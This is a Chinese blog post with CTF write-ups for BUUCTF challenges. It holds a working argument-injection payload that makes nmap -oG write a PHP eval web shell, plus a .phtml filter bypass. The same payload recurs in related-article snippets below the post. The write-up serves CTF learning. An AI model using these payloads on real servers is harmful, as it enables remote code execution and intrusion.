一天一道ctf 第34天（NMAP）

最新推荐文章于 2024-03-15 14:23:54 发布

原创

最新推荐文章于 2024-03-15 14:23:54 发布 · 238 阅读

0 ·

CC 4.0 BY-SA版权

[网鼎杯 2020 朱雀组]Nmap
在这里插入图片描述
这题和之前有一道Online Tool很像，都是操纵NMAP。参数-oG会将结果存放到hack.php文件里

' <?php @eval($_POST["hack"]);?> -oG hack.php '

结果页面回显给我们一个Hacker…，看来是有什么被过滤了。测试下来是php被过滤了，换成标签phtml就可以了(注意两边两个单引号是要的)

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

上传成功后用蚁剑连接，cat /flag拿到flag

[MRCTF2020]PYWebsite
看一下源码发现了这个东西，想着怎么绕过MD5，访问flag.php后看样子用不着了，验证都是在后端的。
在这里插入图片描述

这里提到了IP但我怎么也没想到只要把IP改成127.0.0.1就行了（会不会太简单了点？）
直接在flag.php页面

最低0.47元/天解锁文章

新学期VIP享超值加赠

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

scrawman

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结

杨秀璋的专栏

06-09

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了WHUCTF隐写和逆向题目，包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目，包括CSS注入、越权、csrf-token窃取及CSP绕过，同时总结XSS绕过知识，希望对您有所帮助。第一次参加CTF，还是学到了很多东西。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢这些大佬和师傅们（尤其出题和解题的老师们）~

2023年第二届长沙市职业技能大赛“网络安全“项目样题任务书

Aluxian_的博客

11-06

1321

2023长沙第二届网络安全比赛任务书网络安全项目竞赛需要选手保护企业的信息系统，防止黑客访问和窃取企业的敏感数据。网络安全项目竞赛选手通常需要配置防火墙、服务器等网络安全设备，制定网站安全解决方案来保护企业的系统不被入侵。同时，他们还需要维护并实施企业的网络安全监控系统策略，调查发生在企业内部的网络安全事件。选手需要对企业的信息系统进行安全渗透测试，提前发现可能被黑客利用的漏洞并及时对漏洞进行修补和安全加固。

1 条评论您还未登录，请先登录后发表或查看评论

ctf工具Nmap使用教程图文教程（超详细）

程序员小麦的博客

06-24

1034

kali的命令行中可以直接使用 nmap 命令，打开一个「终端」，输入 nmap 后回车，可以看到 nmap 的版本，证明 nmap 可用。

NewStarCTF2023week4-Nmap

Welcome To Myon'Blog !

10-28

664

这个过滤条件可以筛选出UDP端口开放的数据包，该过滤条件会匹配所有的UDP数据包，因为UDP没有像TCP那样的连接建立过程，所以UDP数据包的到达通常表示端口是开放的。该过滤条件匹配了ICMP "端口不可达"类型的数据包，其中的 "code" 值为3表示端口关闭。这个过滤条件用于查找被目标主机标记为"端口不可达"的数据包，通常表示端口关闭；将端口由小到大排序， 80,3306,5000,7000,8021,9000。尝试提交 flag{80,3306,5000,7000,8021,9000}

buuctf刷题8 (ssti注入&nmap- oG指令&别样的sql注入)

weixin_63231007的博客

10-15

1168

get_flashed_message()是通过flash()传入闪现信息列表的，能够把字符串对象表示的信息加入到一个消息列表，然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类，那么相当于Modifier类被当作函数处理，所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括：echo，print，unset()，isset()，empty()，include，require，...

nmap 速查手册

weixin_30501857的博客

05-23

167

0x00:说明只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩)O 0x01:nmap功能介绍 1.主机存活检测2.端口探测3.服务识别4.操作系统识别5.硬件地址检测6.服务版本识别7.漏洞扫描,使用nmap自带脚本 0x02:简单示例使用ping检测10.0.0.0/24这个网段 nmap -sP 10.0.0.0/24 ...

buuctf-Nmap

m0_62094846的博客

04-07

2843

输入127.0.0.1出现界面，再根据题目的nmap知道是命令执行输入127.0.0.1 | ls |被转义了，查一下可以用什么代替分号也被转义了 %0a没被转义，但是也没用（我之前也觉得没有用，就是尝试一下）那就很难用命令执行了看看能不能输入一句话木马 127.0.0.1 | ' <?php @eval($_POST['value']);?> -oG hack.php ' 筛查后发现是php被过滤了，修改一下 127.0.0....

写一下自已对ctf的了解，以便日后自已需要

m0_50987622的博客

11-07

6258

11.7 本人ctf小白，参加比赛基本处于摸鱼状态，也没有系统了解过ctf以及做过相关的实践和练习，但是，对这一块比较感兴趣，所以，只能说，在学习中，就跟我当初学makefile一样，做下记录，写点自已觉得对自已有用的东西，大概这样。 ctf总共分为五部分，misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。首先，建立在你对前后端足够了解的基础上。 web安全就是黑服务器，pwn就是黑设备黑系统，至于怎么黑，仁者见仁智者见智，取决

实验四 CTF实践 - - Y

young的博客

12-19

911

实验四 CTF实践文章目录实验四 CTF实践前言一、实验步骤和内容二、实施细节1、发现目标 (netdiscover)，找到WebDeveloper的IP地址。截图。2、利用NMAP扫描目标主机，发现目标主机端口开放、服务情况，截图并说明目标提供的服务有哪些？（利用第一次实验知识点）3、若目标主机提供了HTTP服务，尝试利用浏览器访问目标网站。截图。是否有可用信息？4、利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么？5、网络搜索wpscan，简要说明其功能。6、使用 Dirb

CTF-WEB shrine模板注入nmap的基本使用

qq_59350385的博客

07-04

330

[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace('(',

【buuctf】Online tool 命令执行&RCE&nmap

qq_37301470的博客

11-21

3244

Online tool 被自己蠢到了，一句话上传成功后没看见沙盒地址，一直蚁剑连接失败。。。有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_

CTF渗透训练（笔记）

weixin_57536426的博客

12-26

2108

将该请求发送至repeater页面并且修改文件名为要执行的PHP代码，点击go将请求发出，点击Render查看图形化的响应页面，其中包含代码执行的结果.利用远程代码执行漏洞下载木马，因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码，将生成的木马放到web网站的主目录下面

BUUCTF [网鼎杯 2020 朱雀组] Nmap

Senimo

12-09

5177

BUUCTF [网鼎杯 2020 朱雀组] Nmap 考点：nmap -oG 写入文件、-iL读取扫描文件解法：将nmap扫描结果写入文件时加入一句话木马启动环境：类似Nmap的功能，一个输入命令行，提示输入ip地址，尝试输入正常内容：127.0.0.1 可以得到回显结果，猜测是命令执行，尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义，尝试使用;：提示地址错误，尝试了一些其他的命令执行，也无法实现，参考 ...

CTF实践靶机渗透

Radiency的博客

11-23

1853

CTF实践。通过对目标靶机的渗透过程，了解CTF竞赛模式，理解CTF涵盖的知识范围

实验四 CTF实践

qq_56472016的博客

12-07

3371

实验目的：通过对目标靶机的渗透过程，了解CTF竞赛模式，理解CTF涵盖的知识范围，如MISC、PPC、WEB等，通过实践，加强团队协作能力，掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。系统环境：Kali Linux 2、WebDeveloper靶机来源：https://www.vulnhub.com/ 实验工具：不限实验步骤和内容：目的：获取靶机Web Developer 文件/root/flag.txt

CTFWeb-BUUCTF竞赛真题WriteUp(1）_ctf no0b

yy1715713348的博客

03-15

4191

BUUCTF （北京联合大学CTF）平台拥有大量免费的 CTF 比赛真题环境：此处记录下部分 Web 题目练习过程。

CTF训练笔记（五）- 一些获取FLAG的方法总结（待续）